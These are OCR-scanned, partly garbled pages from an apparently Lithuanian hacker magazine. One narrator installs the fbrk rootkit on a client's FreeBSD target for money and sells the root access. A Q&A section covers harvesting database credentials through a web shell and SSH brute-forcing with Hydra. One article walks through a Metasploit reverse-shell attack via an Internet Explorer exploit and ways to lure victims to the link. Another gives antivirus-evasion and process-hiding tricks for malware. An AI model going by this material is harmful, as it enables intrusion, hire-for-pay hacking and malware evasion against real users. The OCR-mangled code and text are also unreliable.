Sukėlęs teises aš nesiryžau pridėti savo vartotojo, kadangi net ir 
pats tingiausias bei bukiausias adminas tai pastebės ir nutrauks 
deguonies tiekimą, už ką užsakovas manęs tikrai nepaglostys ;). 
Taigi aš nusprendžiau apsiriboti paprasčiausiu rootkitu. Kadangi 
tai buvo freebsd sistema, šiuo atveju netiko nei shv, nei adore. 
Čia reikėjo panaudoti specialiai šiai sistemai skirtą rootkitą. Aš 
pasirinkau puikų ir pakankamai seną įrankį, kuris vadinasi fbrk. Jis 
moka daug ką, tačiau viena iš ryškių jo ypatybių yra galimybė slėpti 
bylas ir procesus. | jo konfigą tereikia įtraukti tokias eilutes: 


dov/td/.99/.Atyl0O 
/dav/fd/.99/.ttypO0 


Rootkito įdiegimas taip pat labai malonus: pakanka surinkti 
„/setup, po ko viskas eina kaip per sviestą. Norint su juo gauti 
root teises, reikia apibrėžti aplinkos kintamąjį DISPLAY, kurio 
reikšmė ir bus slaptažodis: 


DISPLAY = “ąwerty"; oxpott DISPLAI; telnet host 


Ir viskas. Tačiau tai toli gražu ne vienintelė fbrk galimybė. 


ĮFinish him!] Aš pasigavau užsakovą ir pranešiau jam geras 
naujienas, kurios jį akivaizdžiai labai nudžiugino. Užsakovas be 
Jokių klausimų man pervedė pusę sumos, aš jam perdaviau gautą 
priėjimą root teisėmis, po ko jis man pervedė likusią dalį. Aš jau 
ne pirmą kartą buvau labai savimi patenkintas ir jau susimąsčiau 
apie būsimą savo elektroninio bičiulio atnaujinimą. 


modiikuojame pil'ą. 


(O) Neseniai viename serveryje gavau web-shellą. 
Teisės — nobody, tačiau aš galiu skaityti dalį 
katalogų. Labai norėčiau žvilgtelėti į DB, tačiau 

neturiu nei vartotojo vardo, nei slaptažodžio. FTP 


slaptažodžiai netinka. Ką daryti? 


Ieškoti bazės vartotojo vardo ir slaptažodžio. Jeigu tu 
O) gali skaityti vartotojų katalogus ir tau pakanka teisių. 

kad skaitytum bylas — ieškok tokio tipo, kaip config. 
php, config.pl, conf.php, db.php, auth.php, login.pl 
ir panašių bylų. Jose galima rasti priėjimo prie DB 

duomenis, pavyzdžiui: 

db host = localnost 

db user = User 

db name = data base user 

db password = gwerty 


Čia vartotojo vardas — user, slaptažodis — gwerty, serverio 
vardas — /ocalhost, duomenų bazė — data base user. 
Turėdamas šiuos duomenis, gali prisijungti ir pasidaryti 
bazės data base user kopiją. Jeigu tau pasiseks, tuomet 
gali būti, jog tavo teisių pakaks visoms bazėms peržiūrėti. 
Manau, tokiu atveju tu žinosi, ką daryti. 


Išbandžiau daug brutforsų, tačiau nė vienas jų 

nenori perrinkinėti SSH slaptažodžių. Rašoma, 

kad Hydra suteikia tokią galimybę, tačiau ban- 

dant paleisti perrinkimą ji keikiasi dėl kažkokio 
modulio. Ką pasiūlytumei? 


Atsakymas akivaizdus: įdiegti šį modulį :). Tiesą 

sakant, tam, kad perrinkiklis nesikeiktų, reikia įdiegti 

biblioteką libssh (http://OxbadcOde.be/libssh/libssh- 

0.11.tg2).o tada prieš Hydra įdiegimą konfigūravimo 
skriptui papildomai perduoti vėliavėlę --enable-libssh. 
Paleidęs iš naujo pamatysi, kad viskas veikia būtent taip, 
kaip ir reikia! 
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PAKLIUVO IR S-SB-UŽLOPYTA WIN- 
DOWS XP SP2. ŠI KLAIDA TAPO DĖMESIO 
VERTU PLAČIAI NUSKAMBĖJUSIOS WMF 
KLAIDOS PRATĘSIMU. BŪTŲ NUODĖMĖ 
JOS NEAPTARTI! Ę 


[Priešistorė] 2006 metų kovo 22 dieną grupė iš 
Didžiosios Britanijos ComputerTerorrism (www.computer- 
terrorism.com) parašė Advisory CT22-03-2006, kuri- 
ame kalbėta apie rimtą visų MS IE 6.0 ir 7 beta versijos 
naršyklių problemą. Derėtų pastebėti, kad, pasak CERT, 
pažeidžiamumą pirmas aptiko Andreas Sandblad iš Secu- 
nia Research. Gana skurdžiame techniniame aprašyme 
buvo nurodytas pagrindinis blogio šaltinis — funkcija crea- 
telextRange(), kuri esant tam tikroms sąlygoms galėjo su- 
kelti neteisingą rodyklių lentelės apdorojimą. Žvilgtelėkime 
į klaidingą kodą iš arčiau: 


0x7053C150 MOV EOX, DWORD PTR DS:[EDI] 
0x7053C166 CALL DWORD PTR [EO] 


Taip dėl blogai apgalvoto duomenų perdavimo naršyklės 
viduje galima suformuoti nekorektišką nuorodą. To rezultate 
ECX registras rodys į neegzistuojanti kodo fragmentą, kas 
privers naršyklę triukšmingai nulūžti. Nepaisant to, pasak 
ComputerTerorrism ekspertų, jeigu rodyklė rodys į reikiamą 
pusę, tuomet mes galime eksploatuoti programą. Tokiu 
atveju valdymą reiktų perduoti Shell-kodui, esančiame 
atmintyje ECX registre saugomu adresu. Vietoje įrodymo 
buvo pateiktas PoC kodas, vaizdžiai demonstruojantis 
DoS IE. Jį gali rasti adresu www.computerterrorism. 
com/research/ie/poc.htm. Neblogai, tiesa? Išsamiau 
paskaityti apie klaidingą funkciją gali čia: http://home..ural. 
ru/-psynet/TextRange.html. 


ĮPažeidžiamumo vystymasis] Vos išplatinus informaciją 
apie saugumo skylę pasirodė keletas skirtingų Oday 
eksploitų. Pirmasis eksploito koncepciją sukūręs žmogus 
buvo hakeris Skylined. Plačiausiai pagarsėjusia šio 


IALIŲ AUKŲ.. SĄRAŠĄ" TAIP Ša 
MAŠINO, 


visrakčio versija laikomas DarkEagle sukurtas eksploitas, kurį gali 
parsisiųsti iš čia: www.milwOrm.com/exploits/1606. Kodas nėra 
labai sudėtingas. Aš manau, kad šiek tiek prie jo pasėdėjus su 
JS dokumentacija, turėtų dingti visi neaiškumai. Šiaip jau pas 
daugelį žmonių eksploitas nepateikė pageidaujamo rezultato 
(įsiūtas Shell-kodas turėjo paleisti calc.exe), vietoje to eksploat- 


S INTERNET EXPLORER 6.0: uojama naršyklė surydavo visą atminti ir nevaikiškai apkraudavo 
Ą TIESIOG APSKRIDO swap“ 


Sklando gandai, jog gali būti, kad DEP apsaugo nuo šio 
pažeidžiamumo, tačiau dabar aš tau negaliu pasakyti, ar taip yra iš 
tiesų. Pats primityviausias eksploitas, kuris avariniu būdu užbaigia 
naršyklės darbą, atrodo maždaug taip: 


<input ype= "dedbas" Id (> 
<saipt“ 

£= document gelElameniByld(,); 

0 LaealsTedRange(); 

</stript> 


Pasirodžius Oday eksploitui pačios MS pateikto pažeidžiamumo 
likvidavimo sprendimo nebuvo. Vienintelis dalykas, kurį pasiūlė 
„Microsoft“ specialistai — uždrausti aktyvaus turinio vykdymą. Beje, 
klaidos pataisymus pateikė trečiųjų šalių gamintojai, tokie, kaip 
gerai šioje srityje žinomi /Defence, determina ir t.t. Kiek aš žinau, 
jų pateikti pataisymai buvo paprasčiausios DLL bibliotekos, kurios 
kraudavosi kartu su potencialiai pažeidžiamomis programomis, t.y. 
IE ir Outlook (beje, pastarasis automatiškai įvykdydavo kenksmingą 
laiške gautą skriptą, todėl į jį reagavo taip pat, kaip ir IE). Nepai- 
sant to. „Microsoft“ programuotojai išleido oficialų langinėms 
skirtą pataisymą, kurį dabar galima gauti adresu www.microsoft. 
com/technet/security/Bulletin/MS06-013.mspx. Atkreipk dėmesį, 
kad biuletenis buvo išpublikuotas tik balandžio 11 dieną. Windows 
gamintojams garbės tokie terminai tikrai neprideda. 


[Globalus eksploatavimas] Jeigu tau patinka su visais eksploitais 
terliotis rankiniu būdu, tuomet gali praleisti viską, kas čia parašyta. 
Tačiau jeigu nieko nepraleisi, tai sužinosi, kaip galima maksimaliai 
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automatizuoti ir supaprastinti naujos klaidos išnaudojimo procesą. 
Taigi pradedam. Iš pradžių iš www. metasploit.org reikia parsisiųsti 
paskutinę MetaSploit Framework versiją (straipsnio rašymo metu 
Ji buvo 2.5), ten pagal nutylėjimą turi būti įsiūtas ir šis naujasis 
eksploitas. Pastaba: šį komplektą aš siunčiausi ir įdieginėjau 
*nix sistemoje. Jeigu tu sėdi su sky >tomis langinėmis, tuomet 
siųskis Cygwin skirtą versiją. Jeigu tu pas save anksčiau įdiegei 
MetaSploit Framework, tuomet IE skirtą visraktį galima pridėti 
kataloge exploits sukuriant bylą ie createtextrange.pm, kurią 
gausi iš http://metasploit.com/projects/Framework/modules/ex- 
ploits/ie createtextrange.pm. Kaip matai, viskas labai paprasta. 
Paleidžiam framework konsolę: „/msfconsole. Patikrinkim, ar 
mūsų eksploitas pateikiamas prieinamų įrankių sąraše (komanda 
„show exploits“). Jis turėtų vadintis „ie createtextrange“. Jeigu 
Jis yra sąraše, tuomet viskas labai gerai: rašom „use ie create- 
textrange“ ir žiūrim, kokius parametrus reikia perduoti norint, 
kad eksploitas suveiktų. Būtinas yra viso labo vienas parametras, 
Skirtas nurodyti jungtį, per kurią turi veikti suklastotas web serveris 
su Užkrėstu puslapiu. Darome taip: „set HTTPPORT 1234“. Dabar 
atėjo pati svarbiausia akimirka: įdaro (PAYLOAD) arba paprasčiau 
šnekant Shell-kodo pasirinkimas. Framework'e tu gali rasti 
padorų langinėms skirtų eksploitų sąrašą, todėl tau nereikia 
kiekvieną kartą pakeisti išeities teksto. Norėdamas pakeisti įrašytą 
Shell-kodą, pasinaudok MetaSploit FrameWork galimybėmis. 
Galima bukai užbindinti jungtį, įvykdyti Program Files pašalinimo 
komandą, pridėti naują vartotoją — galima padaryti ką tik nori! 
Mūsų eksperimente mes panaudosime klasikinį Shell-kodą „set 
PAYLDAD win32 reverse“, kuris susijungs su mūsų serveriu ir 
prijungs mus prie cmd.exe su to vartotojo teisėmis, kuris buvo 
pakankamai neatsargus, kad peržiūrėjo mūsų pateiktą nuorodą. 
Tiesa, vos nepamiršau: kad Shell-kodas prisijungtų prie mūsų, 
one kokio nors Jono mašinos, nurodykime privalomą parametrą 
„LHOST išorinis IP-rūsų mašinos adresas“. Štai ir viskas. Mūsų 
velnio mašiną paleidžiame su komanda „exploit“. Jeigu viskas 
gerai, ekrane pasirodys maždaug toks vaizdelis: 


[1] Storing Revarse Handler. 
["] Waiting for connections to htip://61.65.23.45:1234/ 


Dabar atėjo pats svarbiausias momentas: įdaro (PAYLOAD) arba 
paprasčiau šnekant Shell-kodo pasirinkimas. 


Tai reiškia, kad viskas tiesiog puiku, o šią nuorodą galima išsiųsti 
savo geriausiems draugams: „Liau liau! Pažiūrėk, JOnai, čia, kaip 
KrOOtai atrodo: Attp://61.65.23.45:1234/“. Tiktai įvertink tai, 
kad kai jaunuolis užeis pateiktu adresu, prieš jį pasirodys jovalas, 
kurį matai nuotraukoje. Tai, „švelniai“ tariant, tave išduoda, todėl 
Jeigu tu esi norintis visus į kairę ir į dešinę trojaninti niekšelis, 
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tuomet pataisyk paties ie createtextrange.pm kodą. Išmesk 
po <body onload= "$start()*> pateiktą bjaurų užrašą, kad jis 
daugiau netrukdytų tau ir tavo nuorodos žiūrovų. Kaip matai, šio 
visrakčio iš framework komplekto naudojimas labai panašus į 
ten pat pateiktą WMF eksploito panaudojimą. Šiaip tai nebūtina 
taip išsidavinėti ir kišti visiems savo kenksmingų nuorodų. Tu 
gali sukurti atitinkamą iframe arba tiesiog nulaužtoje svetainėje 
sukonfigūruoti redirect'ą į savo kenksmingą html puslapį. Yra dar 
vienas senas geras būdas, geriau užsirašyk: šią nuorodą įterpti 
savo ICO informacijoje ir lėkti į užsienio forumus pažindintis su 
visais iš eilės. 


Ne vien tik WMFI 

IE ir toliau mums krečia staigmenas, tačiau ji vis dar lieka viena 
populiariausių naršyklių, nepaisant to, kad galima akis pražiūrėti 
peržiūrint joje surastų pažeidžiamumų sąrašą! Vis dėlto ne viskas 
taip blogai, kaip atrodo: pataisymai išleisti, todėl atsinaujink 
ir būk budrus. O šiaip tai žiūrint į tokį audringą Oday eksploitų 
augimą, vertėtų saugotis internete tvyrančios betvarkės, kuomet 
nemąstantys skriptvaikiai sukompiliuos visus ir viską. Man 
atrodo, kad Oday turi būti privačiu dalyku irjį turėti turėtų tik to 
verti žmonės, kurie yra pasiruošę atsakyti už savo poelgius. 


— e —> 


Sitback and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit. 
In the meantime, you can open your task manager and watch how the VM size cf IEXPLORE.EXE grows, while the CPU time ofthis process is very low 
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Bestuburių gyvenimas ir 


mirtis sistemoje 

Išgyvenimas sistemose su žiauriomis 
kvotomis 

GLOBALIŲ VIRUSŲ EPIDEMIJŲ LAIKAS 
SENAI PRAEJO, O DAUGELIS KIRMINŲ 
SIANDIEN MIRSTA DAR PRIEŠ IŠLĮSDAMI. 
NET IR LOKALIAS EPIDEMIJAS SUKELTI 
PAVYKSTA MAZAI KAM... 


SOFTWARE 


IMPLANT 


Pabandykime išsiaiškinti, kas virusams trukdo plisti ir tuo 
pačiu aptarkime naujas virusų koncepcijas, adaptuotas 
žiaurioms šiuolaikinio gyvenimo sąlygoms. 

Kaip anksčiau buvo gerai 

Iki pat W2K atsiradimo Windows vartotojai net nežinojo, 
kad egzistuoja toks dalykėlis, kaip resursų „kvotavimas“. 
Kiekvienas procesas gaudavo 4 Gb adresuotos erdvės 
(iš kurių realiai panaudoti buvo galima tik pusantro). 
Saugumo posistemė ribojo priėjimą prie bylų, draudė 
iškvietinėti kai kurias API funkcijas ir t.t., tačiau nebuvo 
jokiu kitokių apribojimų. Bet koks procesas, net ir tur- 
intis Guest teises, galėjo informacija užpildyti visą diską, 
sukurti maksimalų langų kiekį ir suryti visą operatyvinę 
atmintį. Vienintelis dalykas, ką šioje situacijoje galėjo 
padaryti administratorius nuspausti Reset mygtuką, 
tikėdamasis, kad netikėtas perkrovimas disko particijos 
nepavers mėšlo krūva. W2K sistemoje (praėjus daugybei 
metų nuo šios funkcijos atsiradimo *nix sistemose) galų 
gale atsirado disko kvotų galimybė, kurios kiekvienam 
vartotojui apibrėžė maksimalų prieinamos disko vietos 
dydį. Po šito XP SP2 kiekvienam procesui apribojo TCP/IP 
susijungimų kiekį per laiko tarpą, kas pagal idėją turėjo 
užkirsti kelią internete susidarantiems „kamščiams“, kurie 
susidarydavo dėl virusų epidemijų prasiveržimo. 

Šiuo metu „Microsoft“ rimtai kuria sistemą, kuri krautųsi 
iš Read-Only kaupiklių (UNIX tai moka), o kai tai bus 
padaryta, dings vykdomų bylų modifikavimo galimybė 
(tiesa, virusai kaip ir anksčiau galės įsiskverbti į atmintį ir 
į administratoriaus kuriamas vykdomas bylas). 

Kvotų praktiškai niekas nenaudoja (daugelis nė neįtaria, 
kad tokios egzistuoja), tačiau ateitis jau lipa ant kulnų. 
Eilinis galas virusams? O gal artėja jaudinantis virusų 
atgimimo akimirka, kuomet kovodami už išlikimą jie 
bus priversti išmokti parazituoti programose, kaip tai 
daro tikri biologiniai virusai? Galbūt jie bus priversti pa- 
sitraukti, papildydami istorijos sąvartyną naujomis kodo 
eilutėmis? 
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ĮKvotą kiekvienam vartotojui!] Windows sistemoje 
realizuoti kvotavimo metodai paliečia visus sistemos 
gyvybiškumo aspektus, todėl prieš pradedant gilintis į 
rimtesnius dalykus reikėtų kaip nors klasifikuoti visą šį 
ūkį. Į pirmąją grupę pakliūva kvotos, kurios yra susijusios 
su atskirai paimtu procesu, tiksliau — su jo PID. Sistema 
leidžia sekti ir riboti bendrą proceso „gyvenimo“ laiką, 


UNITS 


WyKaSTm. RI 


neteisėto, 


sugaišto procesoriaus laiko kiekį (tiek taikomajame lygyje, tiek ir 
branduolio režime), įvedimo/išvedimo operacijų skaičių (Ly. nuskai- 
tytus/įrašytus baitus), pareikalautos (realiai išskirtos) atminties 
kiekį irt.t. Likusius parametrus galima sužinoti su „Task Manager“. 
NT kol kas dar nemoka riboti atminties Ir įvedimo/išvedimo apim- 
ties, tačiau tai nesudėtinga atlikti perimant pagrindines native API 
funkcijas, kuo jau užsiiminėja kai kurios antivirusinės programos 
ir asmeninės ugniasienės. Galų gale Windows pradeda igauti 
daugiavartotojiškos sistemos bruožų, kas atneš tiek daugybę 
privalumų, tiek ir grėsmę virusų egzistavimui. Kai kurie iš jūsų gali 
paprieštarauti, jog NT nuo pat pradžių buvo daugiavartotojiška. Ir 
kuo gi tai realiai pasireiškė? Sistemoje gali būti tik vienas vartoto- 
jas (programų paleidimas kito vartotojo vardu nesiskaito), o prieš 
kuriant naują sesiją, ankstesnė turi būti užbaigta. 

Dar blogiau, vartotojai negali įdieginėti programų į „savo“ namų 
katalogus, o daugiavartotojiškas priėjimas apsiriboja vien tik 
priėjimo prie duomenų valdymu ir individualiais nustatymais (kiekvi- 
enam vartotojui — savo HKEY CURRENT USER)! Tuo tarpu *nix 
sistemose kas tik nori gali sau leisti įdiegti nuosavas sisteminių 
bibliotekų ir programu versijas, kurios bus prieinamos tik tam var- 
totojui ir kurios nedarys jokios įtakos visos likusios sistemos darbui! 
Tarkim, kad Marytė nori dirbti su Word 97, Onutė — su Wora 2000, 
o Janinai duok tik Word XP. Ką gali padaryti administratorius?! Ogi 
nieko! Arba ilgai šokti su būgnu ir įdieginėti trečiųjų šalių gamintojų 
įrankius, arba rimtai susimąstyti apie tai, kiek vartotojų realiai 
pripažinti gali NT. Daugelis kompanijų, užsiimančių hostingo tiekimo 
paslaugomis arba prekiaujančių klasterinių sistemų procesoriniu 
laiku, aktyviai naudoja kvotavimo mechanizmus, be kurių toks 
sumanymas netektų prasmės. 


[Kaip dauginasi ežiukai, arba kaip atsiranda „zombiai“] 
Su PID'u susijusias kvotas lengva apeiti. Pakanka periodiškai 


(pavyzdžiui, kartą per minutę arba net per sekundę!) sukurti naują 
procesą, tuo pačiu užbaigiant ankstesnį. Naujai sukurtas procesas 
gauna pilną šviežios kvotos porciją, o kai ji išsenka, galima vėl 
kartoti „atgimimo“ triuką. Tai labai senas būdas, kurį naudojo pats 
Mariso Kirminas, tačiau jis buvo žinomas dar anksčiau. Be abejo, 
toks „aktyvumas“ nėra normalus reiškinys, todėl jis pritraukia 
asmeninių ugniasienių ir antivirusų dėmesį, tačiau juos lengva 
pergudrauti. 
Antivirusas savo gyvenimą pradeda nuo atminties patikrinimo. 
Jis gauna aktyvių procesų sąrašą, po ko kruopščiai kiekvieną jų 
patikrina. Procesų sąrašą legaliai galima gauti su KERNEL32. 
DLL bibliotekos eksportuojama funkcija TOOLHELP32, kurią 
perima daugelis nepageidaujančių būti pastebėtais virusų. Pati 
peremimo technika labai paprasta ir aprašyta daugybėje hakeriškų 
straipsnių, todėl ties ja neapsistosime, juo labiau kad egzistuoja 
kitas informacijos šaltinis — nedokumentuota funkcija NtOueryln- 
formationProcess, kurią eksportuoja NTDLL.DLL, tačiau faktiškai ji 
realizuota NTOSKRNL.EXE, todėl perimti „tiesioginį“ jos iškvietimą 
yra sunkiau. Be asemblerio žinių ir mokėjimo rašyti tvarkykles 
čia jau neapsieisi, tačiau, laimė, egzistuoja ir kitų būdų, kurie 
veikia visose operacinėse sistemose ir nereikalauja smegenų rievių 
įtempimo. Atlikime paprastą eksperimentą. Paleidžiam FAR (jeigu 
tik jis nebuvo paleistas anksčiau), spaudžiam <F11> ir įskiepių 
sąraše surandame „Process list“, kuris į einamą skydelį pateikia 
procesų sąrašą. Norint apie procesą gauti išsamesnės informacijos, 
reikia užvesti ant jo kursorių ir paspausti <F3> arba <F4>. „Ah“ 
tariame netikėtai pilną alaus skardinę suradusio žmogaus balsu. 
Štai jis! Ass of the Dragon! Prieš akis iškyla proceso pavadinimas, 
vykdomos bylos kelias, pirminio proceso PID, paleidimo laikas ir 
kita informacija. Pilnas kelias — tai nėra gerai. Bet kuris vartotojas 
(antivirusas) gali iš disko nuskaityti bylą ir pažiūrėti, kas čia per 
bjaurastis! Ką mes čia galime padaryti? Pakeisti tikrąjį kelią kuo 


nors kitu? Deja! Legaliomis priemonėmis iš taikomojo lygio šios 
informacijos nepakeisi (mažiausiai teks gauti administratoriaus 
teises). Be viso to NT blokuoja vykdomą bylą iki pat jos vykdymo 
užbaigimo — komanda DeleteFile grąžina klaidą, todėl tokios 
svajonės, kurioje būtų sukurta laikina automatiškai po paleidimo 
save pašalinanti byla, įgyvendinti neįmanoma. Ir štai scenoje pa- 
sirodo jūsų nuolankus tamas, t.y. aš. Kukliai gniauždamas rankas, 
jis taria: „NT blokuoja tik bylos pašalinimą ir rašymą į ją, tačiau 
leidžia ją pervadinti. Beje, pervadinta gali būti ne tik pati byla, bet 
ir kelias iki jos, tegu dėl to mums ir teks patirti įvairaus sunkumo 
lygio pašalinių efektų“. 

Kas gi tai per efektai? Pabandykime pažiūrėti! Sukurkime 
katalogą „DAY“, į jį įkelkime notepad.exe (arba bet kokią 
kitą tavo skonį atitinkančią programą) ir ją paleiskime. Dabar 
„1“ pervadinkime į „a“. Spėk, ką mes gausim? Nepaisant visų 
mūsų pervadinimų, katalogas „DM11213V“ kaip buvo, taip ir liko, 
tačiau dabar jis visiškai tuščias! Be to, buvo sukurtas katalogas 
„DMA“ su jame esančiu notepad'u. Šaunu! Pervadinkime 
notepad.exe į xxx.exe. Kaip matome, jis visiškai nesipriešina ir 
yra sėkmingai pervadinamas. Analogiškai gali būti pervadinti ir 
17 


1 Me 
FAR savo makrosus saugo sisteminiame registre, kuris prieinamas bet kuriai programai 


Select Ihe columns that wil appear on the Process page 
ol the Task Manager. 
[] Page Fauks Deka 

[V] PID (Process Identiier) | [] Virtual Memowy Size 
[V] CPU Usage D] PagedPoad 
[V] CPU Time (1 Nompaged Poai 
[4] Memoy Usage [V] Base Priority 
[] Memowy Usage Dela ] Handle Count 
[V] Peak Memoy Usage | |] Ihread Count 
[] Page Eauks ] GDI Objects 
[) USER Objects 110 Wikes 
[V Reads [V] 10 Wiie Bytes 
[V] O Read Bytes 10 Other 
T] Session ID CVO Other Bytes 
L] User Name 

LCa Cana | 


2/ Atvaizduojamų stulpelių pasirinkimas 
NT stebimi procesoriaus resursai 
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3/ Specialus įskiepis 
leidžia FAR'UI stebėti procesus 


katalogai „2“ bei „3“. Vienintelis dalykas, kurio mes negalime 
daryti — keisti disko, tačiau mums to ir nereikia! Svarbiausia, 
kad iš „DA123WNnotepad.exe“ paleista byla persikėlė į „Diav3V 
xxX.exe“, t.y. pakeitė ne tik savo pavadinimą, bet ir gyvenamąją 
vietą. O kaip sekasi su procesų sąrašu? Taigi žinokite, kad NT jį 
sukuria tik vieną kartą — proceso sukūrimo metu — ir niekada 
neatnaujina. 

Tai reiškia, kad mūsų atveju FAR (kaip ir bet kuri kita programa) 
„sąžiningai“ rodo pradinį kelią, kurio jau nėra. 


Module: NOTEPAD.BXE 

Fall path: DAIN2MNIOTEPAD.EKE 
PID: 664 

Porent PID: 7]6 (Faraxe) 
Priority: 8 

Threads: 1 


Antivirusas paprasčiausiai negalės atidaryti bylos „DMN231NOTE- 
PAD.EXE“. Kaip sakoma, kas nespėjo, tas pavėlavo. Teoriškai (ir 
praktiškai) antivirusas gali „prisijungti“ prie proceso per jo PID, 
tačiau tam lengva pasipriešinti. Pakanka išdarinėti bet kokį gerą 
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A/ Užduočių dispečeris 
naudoja nedokumentuotą funkciją NtOLeny/nformationProcess 


Armadillo arba eXtreme Protector tipo pakuotoją — jie tam priešinasi 
visomis keturiomis! Taip pat įmanomas variantas būtų ankstesnio kelio 
vietoje įkurti kokią nors nekaltą bylą tokiu pačiu pavadinimu — štai 
tuomet patiklus antivirusas būtų apgautas kaip reikiant ir nė neitartų. 
kaip šauniai mes jį pergudravome. 

Taip apeiti rezidentinių stebėjimo programų jau nepavyks. Jos 
periminėja už bylų nuskaitymą ir procesų paleidimą atsakingas API 
funkcijas (paprastai tai yra Createfile ir CreateProcess), todėl pro- 
grama patikrinama su analizatoriumi dar prieš ją paleidžiant. Prieš 
keletą metų aš buvau „Hakeryje“ parašęs straipsnį „Išgyvenimo 
sudrumstame vandenyje technika, arba kaip apgauti antivirusą“ 
(žurnale jis vadinosi „Maskavimosi paslaptys“), kuriame aprašiau 
keletą elegantiškų ir efektyvių metodų, leidžiančių apsukti antivirusą 
su visais jo euristiniais analizatoriais. Tuomet pakakdavo programą 
supakuoti kokiu nors naujesniu pakuotuvu, o įėjimo taške įterpti 
jump į savo thunk, kuris panaudoja save modifikuojantį kodą, 
struktūrines išimtis arba naujoviškas SSE komandas, po ko atstato- 
mas originalus jump'o ištrintas turinys ir valdymas perduodamas 
išpakuotuvui. Tačiau per pastarąjį laiką antivirusinių sistemų virtual- 
ios mašinos žymiai sutvirtėjo, todėl dalis šių triukų jau nebeveikia, 0 
greitai jie iš viso nebeveiks! Ką gi daryti? Be panikos! Neskubėkite, 
ir būsite pirmi — geriau pajudinkite smegenis. 

Paprasčiausia būtų į thunk įterpti funkciją SetTimer/Sleep, kuri 
originalų įėjimo tašką iškviečia po keleto sekundžių. Nė vienas man 
žinomų antivirusų neanalizuoja SetTimer argumentų ir taip ilgai 
nelaukia. Mano nuomone, programa turėtų atrodyti šiai taip: 


Seifimer(,,); 
Sleep); 
biit(); 


2. CodeRed. IIS fucker 


1. Pašto kirminas MyDooM 


Be abejo, toks komandų derinukas yra keistas, tačiau mašininės 
logikos požiūriu jis visiškai teisingas. Taip pat galima naudoti API 
funkcijos OueueUserAPC sukuriamus asinchroninius procedūrų 
iškvietimus (APC — Asynchronous Procedure Call). Čia daug ko 
galima prigalvoti! Tačiau juk mes dabar visai ne apie tai šnekame! 
Sugrižkime prie mūsų tėvo proceso identifikatorių (parent PID). 
Antivirusams ir pažangiems vartotojams tai tikras informacijos lo- 
bynas. Palmkime, pavyzdžiui, į Microsoft Support Tools komplektą 
įeinanti įrankį tlist ir paleiskime jį su opcija „t“, 0 dar geriau būtų 
pasinaudoti Marko Rusinovičiaus Process Expl i 
nemokamai parsisiųsti iš ww.sysinternals.com/Utilit 
plorerhtml. Procesų hierarchija čia matosi kaip ant delno! O jeigu 
piminis procesas jau baigėsi ir parent PID rodo į niekur? Tuomet 
susiformuoja iš karto prie savęs dėmesį traukiantis procesas „zom- 
bis“, ypač jeigu šis procesas periodiškai sukuria naujus „zombius“. 
o pats dingsta. Deja! Visa tai riboja technika! Kaip rodo praktika, 
Jle Vis dėlto tokiais ir lieka, ypač jeigu dauginamasi gudriai, prieš 
proceso užbaigimą išlaikant nedidelę pauzę. Tuomet sistemoje 
nuolat bus lygiai du „zombiai“ su tokiais pačiais vardais, nors pan- 
audojant kryžminį „apdulkinimą“ galima sukurti du „zombius“ skirt- 
ingais vardais, kurie pakaitomis iškvietinėja vienas kitą su nuolat 
besikeičiančiais PID'ais. Tačiau ne visi vartotojai kreipia dėmesį į 
PID'us. Praktinės šios schemos realizacijos procese programuoto- 
jas neišvengiamai susiduria su duomenų perdavimo problema iš 
vieno proceso kitam. Kaip ją įgyvendinti? Yra labai dailus triukas, 
leidžiantis bet kuriuo metu nutraukti proceso vykdymą (pavyzdžiui, 
iškilus antiviruso grėsmei), atnaujinant sukurto „zombio“ darbą nuo 
tos pačios vietos. Tai paprasta! Visi proceso kintamieji saugomi 
bendroje atminties dalyje, į kurią prieš užbaigimą įrašomas ir 
registrų kontekstas. Jis nuskaitomas su funkcija GetThreadCon- 
text, 0 įrašomas — su SetThreadCantext. Savaime suprantama, 
kiekvieno srauto (thread) kontekstas turi būti išsaugotas atskirai. 
Sukurtas procesas iš bendros atminties srities nuskaito savo tėvo 
kontekstą, o savąjį sukonfigūruoja rankiniu būdu su nesudėtingu 
asemblerio intarpu. Taip kenksmingą virusą kuriančiam hakeriui 
nėra jokio skirtumo, kiek procesų dalyvauja šioje schemoje. Per- 
sijungimas įvyksta visiškai „skaidriai“, ir jeigu be viso to antrinis 
procesas paveldi visų savo pirminių objektų deskriptorius, programa 
vykdoma taip, lyg nė nebūtų įvykę jokių persijungimų. O kvotos yra 
nuolat atnaujinamos, taip ugnies degimas vis pakurstomas naujais 
sausų malkų glėbiais! 


[Svetimų procesų užgrobimas] Šiai mes Ir prisikasėme iki 
pačių parazitų. Užuot veisus „zombius“, rizikavus būti aptiktam ir 
generavus niekam nereikalingą sistemą apkraunantį aktyvumą, 
ar ne geriau būtų slapta įsiskverbti į svetimą programą ir panau- 
doti jos resursus kaip savus? Puiki idėja, tiktai... bet kokį žinomą 
įsiskverbimo mechanizmą lengvai atpažįsta antivirusai ir asmeninės 
ugniasienės. 

Norint išgyventi, reikia pasiūlyti radikaliai naują būdą, kurio 
nepavyktų niekam kontroliuoti. Didžioji virusų cialis savo kodą įterpia 
su funkcija WriteProcessMemory, kurią kontroliuoja visi įmanomi 
sargai. O kaip jie gali ją kontroliuoti? Paprastai naudojamas toks 
metodas: atmintyje taip pataisoma KERNEL32.DLL eksporto 
lentelė, kad WriteProcessMemory rodytų į antivirusinį priedą, kuris 
tikrina, kas ir kodėl iškviečia šią funkciją. Kitais atvejais taisomas 
past funkcijos WriteProcessMemory kodas (pavyzdžiui, į jos pradžią 
įterpiamas jump į antiviruso thunk).. Trumpiau šnekant, iškvietinėti 
WriteProcessMemory gali tik savižudis, juo labiau kad WriteProc- 
essMemory — tai tik iš NTDLL.DLL bibliotekos eksportuojamas 
ZwProtectVirtualMemory „apvalkalas“, kurį kontroliuoja žymiai 
mažiau antivirusų/ugniasienių. Savo ruožtu ZwProtectVirtualMemory 
kreipiasi tiesiogiai į operacinės sistemos branduolį. Tai daroma per 
pertraukimą INT 2Eh, į EAX registrą įkeliant reikšmę 77h. Praded- 
ant XP sąveikos su branduoliu sąsaja įgyvendinama per specialią 
mašininę komandą sysenter, tačiau INT 2Eh pertraukimas ir to- 
liau palaikomas siekiant išsaugoti suderinamumą su senesnėmis 
sistemų versijomis. 


„Aon:77F82C30 ZWProtedVirtuallkemory proc neai 
Aon77F82G0 aig 0 dword pir 4 
ton:77F8200 
Aes:77F82030 mov ax, 774 ; NiPilecVirtualllemoy 
lan odų, [esp+ ag 0] 

im 2Eh 

tetn 14h 


toxt:77F82C35 
tert:77F82C39 
text:77F82(3B 


